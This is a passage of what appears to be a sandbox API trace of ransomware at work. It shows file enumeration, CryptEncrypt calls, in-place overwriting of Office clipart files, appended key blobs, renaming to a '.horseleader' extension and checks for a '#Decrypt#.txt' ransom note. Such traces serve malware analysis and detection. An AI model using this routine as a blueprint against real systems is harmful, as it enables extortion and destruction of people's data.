lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3780) returned 1 [0253.518] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xec4, lpOverlapped=0x0) returned 1 [0253.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff13c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.519] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xec4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xec4, lpOverlapped=0x0) returned 1 [0253.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.520] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.520] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.520] CloseHandle (hObject=0x158) returned 1 [0253.520] GetProcessHeap () returned 0x780000 [0253.520] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.520] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.horseleader") returned 79 [0253.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.horseleader")) returned 1 [0253.523] GetProcessHeap () returned 0x780000 [0253.523] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.523] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9e80900, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e80900, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0x1044, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00274_.WMF", cAlternateFileName="")) returned 1 [0253.523] lstrcmpiW (lpString1="BL00274_.WMF", lpString2="Windows") returned -1 [0253.523] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 67 [0253.523] StrStrIW (lpFirst="BL00274_.WMF", lpSrch=".horseleader") returned 0x0 [0253.523] lstrcmpW (lpString1="BL00274_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.523] lstrcmpW (lpString1="BL00274_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.523] lstrlenW (lpString=".testttjffg") returned 11 [0253.523] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.523] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.523] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 67 [0253.524] StrStrW (lpFirst="BL00274_.WMF", lpSrch=".txt") returned 0x0 [0253.524] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4164) returned 1 [0253.524] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1044, lpOverlapped=0x0) returned 1 [0253.526] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffefbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.526] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1044, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1044, lpOverlapped=0x0) returned 1 [0253.527] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.527] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.527] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.527] CloseHandle (hObject=0x158) returned 1 [0253.527] GetProcessHeap () returned 0x780000 [0253.527] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.527] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.horseleader") returned 79 [0253.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.horseleader")) returned 1 [0253.528] GetProcessHeap () returned 0x780000 [0253.528] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.528] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac309900, ftCreationTime.dwHighDateTime=0x1bd4b43, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xac309900, ftLastWriteTime.dwHighDateTime=0x1bd4b43, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00296_.WMF", cAlternateFileName="")) returned 1 [0253.528] lstrcmpiW (lpString1="BL00296_.WMF", lpString2="Windows") returned -1 [0253.528] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 67 [0253.528] StrStrIW (lpFirst="BL00296_.WMF", lpSrch=".horseleader") returned 0x0 [0253.528] lstrcmpW (lpString1="BL00296_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.528] lstrcmpW (lpString1="BL00296_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.528] lstrlenW (lpString=".testttjffg") returned 11 [0253.529] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.529] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.529] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 67 [0253.529] StrStrW (lpFirst="BL00296_.WMF", lpSrch=".txt") returned 0x0 [0253.529] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=812) returned 1 [0253.529] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x32c, lpOverlapped=0x0) returned 1 [0253.531] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.532] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x32c, lpOverlapped=0x0) returned 1 [0253.532] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.532] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.532] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.532] CloseHandle (hObject=0x158) returned 1 [0253.532] GetProcessHeap () returned 0x780000 [0253.532] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.532] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.horseleader") returned 79 [0253.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.horseleader")) returned 1 [0253.533] GetProcessHeap () returned 0x780000 [0253.534] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.534] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf533800, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdf533800, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x332e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00390_.WMF", cAlternateFileName="")) returned 1 [0253.534] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="Windows") returned -1 [0253.534] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 67 [0253.534] StrStrIW (lpFirst="BL00390_.WMF", lpSrch=".horseleader") returned 0x0 [0253.534] lstrcmpW (lpString1="BL00390_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.534] lstrcmpW (lpString1="BL00390_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.534] lstrlenW (lpString=".testttjffg") returned 11 [0253.534] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.534] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.534] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.534] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.536] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 67 [0253.536] StrStrW (lpFirst="BL00390_.WMF", lpSrch=".txt") returned 0x0 [0253.536] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13102) returned 1 [0253.536] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x332e, lpOverlapped=0x0) returned 1 [0253.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffccd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.553] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x332e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x332e, lpOverlapped=0x0) returned 1 [0253.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.553] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.553] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.553] CloseHandle (hObject=0x158) returned 1 [0253.553] GetProcessHeap () returned 0x780000 [0253.554] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.554] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.horseleader") returned 79 [0253.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.horseleader")) returned 1 [0253.555] GetProcessHeap () returned 0x780000 [0253.555] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.555] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf0de00, ftCreationTime.dwHighDateTime=0x1bd4b03, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdcf0de00, ftLastWriteTime.dwHighDateTime=0x1bd4b03, nFileSizeHigh=0x0, nFileSizeLow=0x69aa, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00392_.WMF", cAlternateFileName="")) returned 1 [0253.555] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="Windows") returned -1 [0253.555] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 67 [0253.555] StrStrIW (lpFirst="BL00392_.WMF", lpSrch=".horseleader") returned 0x0 [0253.555] lstrcmpW (lpString1="BL00392_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.555] lstrcmpW (lpString1="BL00392_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.555] lstrlenW (lpString=".testttjffg") returned 11 [0253.555] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.555] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.555] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 67 [0253.556] StrStrW (lpFirst="BL00392_.WMF", lpSrch=".txt") returned 0x0 [0253.556] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=27050) returned 1 [0253.556] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.559] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.559] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x19aa, lpOverlapped=0x0) returned 1 [0253.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe656, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.560] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x19aa, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x19aa, lpOverlapped=0x0) returned 1 [0253.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.560] CloseHandle (hObject=0x158) returned 1 [0253.560] GetProcessHeap () returned 0x780000 [0253.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.560] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.horseleader") returned 79 [0253.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.horseleader")) returned 1 [0253.561] GetProcessHeap () returned 0x780000 [0253.561] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.561] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd65d6900, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd65d6900, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1b54, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00524_.WMF", cAlternateFileName="")) returned 1 [0253.561] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="Windows") returned -1 [0253.562] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 67 [0253.562] StrStrIW (lpFirst="BL00524_.WMF", lpSrch=".horseleader") returned 0x0 [0253.562] lstrcmpW (lpString1="BL00524_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.562] lstrcmpW (lpString1="BL00524_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.562] lstrlenW (lpString=".testttjffg") returned 11 [0253.562] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.562] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.562] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.563] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 67 [0253.563] StrStrW (lpFirst="BL00524_.WMF", lpSrch=".txt") returned 0x0 [0253.563] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6996) returned 1 [0253.563] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b54, lpOverlapped=0x0) returned 1 [0253.571] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe4ac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.571] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b54, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b54, lpOverlapped=0x0) returned 1 [0253.571] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.571] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.571] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.571] CloseHandle (hObject=0x158) returned 1 [0253.572] GetProcessHeap () returned 0x780000 [0253.572] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.horseleader") returned 79 [0253.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft 